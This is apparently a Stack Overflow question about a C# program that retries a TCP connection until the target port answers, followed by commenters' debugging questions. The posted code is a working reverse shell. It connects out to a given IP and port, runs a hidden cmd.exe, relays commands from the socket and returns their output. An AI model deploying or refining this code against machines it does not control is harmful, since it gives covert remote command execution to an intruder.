# Tcp not connecting after pinging target port

Tags: c#, tcp, ping

I am writing a programm to control a computer from another one via cmd. I ran into a problem, when I want to make sure the host is up.

```
try
            {
                using (TcpClient client = new TcpClient(IP, portNumber))
                {
                    using (Stream stream = client.GetStream())
                    {
                        using (StreamReader rdr = new StreamReader(stream))
                        {
                            streamWriter = new StreamWriter(stream);

                            StringBuilder strInput = new StringBuilder();

                            Process p = new Process();
                            p.StartInfo.FileName = "cmd.exe";
                            p.StartInfo.CreateNoWindow = true;
                            p.StartInfo.UseShellExecute = false;
                            p.StartInfo.RedirectStandardOutput = true;
                            p.StartInfo.RedirectStandardInput = true;
                            p.StartInfo.RedirectStandardError = true;
                            p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                            p.Start();
                            p.BeginOutputReadLine();

                            while (true)
                            {
                                strInput.Append(rdr.ReadLine());
                                strInput.Append("\n");
                                p.StandardInput.WriteLine(strInput);
                                strInput.Remove(0, strInput.Length);
                            }
                        }
                    }
                }
            }
            catch (Exception e )
            {
            Console.WriteLine(e);
            }
```

This is the code for the tcp remote connection. It works very well standalone. Now I tried modifying it, so that it will try to connect, until a connection is established. So I added a while loop and a PingHost method to ping the host on a specific port:

```
                string IP = "My_IP_for_testing";
            int portNumber = 1234;
            bool available = PingHost(IP, portNumber);
            while (available == false)
                {
                    Thread.Sleep(500);
                    available = PingHost(IP, portNumber);
                    Console.WriteLine("Failure");
                }
            Console.WriteLine("Success");
            try
            {
                using (TcpClient client = new TcpClient(IP, portNumber))
                {
                    using (Stream stream = client.GetStream())
                    {
                        using (StreamReader rdr = new StreamReader(stream))
                        {
                            streamWriter = new StreamWriter(stream);

                            StringBuilder strInput = new StringBuilder();

                            Process p = new Process();
                            p.StartInfo.FileName = "cmd.exe";
                            p.StartInfo.CreateNoWindow = true;
                            p.StartInfo.UseShellExecute = false;
                            p.StartInfo.RedirectStandardOutput = true;
                            p.StartInfo.RedirectStandardInput = true;
                            p.StartInfo.RedirectStandardError = true;
                            p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                            p.Start();
                            p.BeginOutputReadLine();

                            while (true)
                            {
                                strInput.Append(rdr.ReadLine());
                                strInput.Append("\n");
                                p.StandardInput.WriteLine(strInput);
                                strInput.Remove(0, strInput.Length);
                            }
                        }
                    }
                }
            }
            catch (Exception e )
            {
            Console.WriteLine(e);
            }
        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
    {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data))
        {
            try
            {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            }
            catch (Exception ex)
            {
                // silence is golden
            }
        }
    }
        public static bool PingHost(string hostURI, int portNumber) 
        {
        try
        {
            using (TcpClient client = new TcpClient(hostURI, portNumber))
                client.Client.Disconnect(true);
            return true;
        }
        catch
        {
            return false;
        }
        }
    }
}
```

The exception thrown is the same as not being able to establish a connection with the first code sample I posted (Host is not up, ExtendedSocketException (10061)). I hope that you can help me!
Have a nice day!

Comment: The full exception message would be useful. How is your setup? Are both machines on the same LAN? Have you checked firewalls and router port forwarding? Is there actually any application on the other machine listening on port 1234?

Comment: Hello, yes both Machines are running on the same computer, one is a virtual machine. As I said, the first script works fine, but the modified version doesn't. I will provide the full exception when I have the time for it.

Comment: @Xerillio the error code is TCP error 10061

Comment: A couple of things: your second code snippet will not compile (too many "}") so it seems like some code is missing in your sample. Can you update your question with the full stack trace of the exception so we can see where exactly the exception is thrown? Which .NET version are you using? Perhaps [this question](https://stackoverflow.com/questions/425235/how-to-properly-and-completely-close-reset-a-tcpclient-connection) is connected